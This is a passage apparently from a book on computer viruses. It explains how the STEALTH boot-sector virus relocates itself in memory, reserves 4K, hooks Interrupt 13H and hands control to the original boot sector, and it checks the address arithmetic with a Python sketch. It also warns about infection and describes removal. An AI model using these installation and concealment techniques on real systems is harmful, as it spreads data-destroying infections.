
9820:7000 to 9820:7BFF. The original boot sector occupies

9820:7A00 to 9820:7BFF (since it is the sixth of six sectors loaded).

The viral boot sector then subtracts 4 from the word at 0040:0013H

to reserve 4 kilobytes of memory for the virus. Next, the viral boot

sector reroutes Interrupt 13H to the virus. Finally, it moves the

original boot sector from 9820:7A00 to 0000:7C00 and executes it.

The original boot sector proceeds to load DOS and get the computer

up and running, oblivious to the fact that the system is infected.
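
The segment:offset addresses quoted above can be checked by converting them to linear addresses (segment times 16, plus offset). The Python sketch below does that arithmetic for the figures in this section. The function name linear is invented for the illustration.

```python
SECTOR = 512


def linear(segment: int, offset: int) -> int:
    """Real-mode linear address, wrapped to the 8086's 20 address bits."""
    return ((segment << 4) + offset) & 0xFFFFF


top = linear(0xA000, 0x0000)        # first byte past 640K
viral_bs = linear(0x9820, 0x7C00)   # relocated viral boot sector
body = linear(0x9820, 0x7000)       # start of the six sectors loaded
old_bs = linear(0x9820, 0x7A00)     # original boot sector, sixth sector

if __name__ == "__main__":
    print(f"viral boot sector at {viral_bs:05X}, {top - viral_bs} bytes below the top")
    print(f"six-sector area from {body:05X} to {viral_bs - 1:05X}")
    print(f"old boot sector at {old_bs:05X}")
    footprint = top - body
    print(f"footprint {footprint} bytes, rounded up to {-(-footprint // 1024)}K")
```

The relocated boot sector sits exactly 512 bytes below A000:0000, the six sectors below it fill 9820:7000 through 9820:7BFF, and the total of seven sectors (3584 bytes) rounds up to the 4 kilobytes that are reserved.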

A Word of Caution

The STEALTH virus code is listed in Appendix E. At the

risk of sounding like a broken record, I will say this virus is highly

contagious. You simply don't know when it is there. It hides itself

pretty well, and once it's infected several disks, it is easy to forget

where it's gone. At that point, you can kiss it goodbye. Once a

floppy disk is infected, you should reformat it to get rid of the virus.

If your hard disk gets infected, the safest way to be rid of it is to do

a low level format of Track 0, Head 0. Of course, IDE drives won't

let you do that too easily. Alternatively, you can write a program

that will save and restore your partition sector, or you can run

FDISK on the drive to overwrite the partition sector. Overwriting

the partition sector will keep the virus from executing, but it won't

clean all its code off your system. Obviously, if you're going to

experiment with this virus, I suggest you only do so on a system

where you can afford to lose all your data. Experiment with this

virus at your own risk!
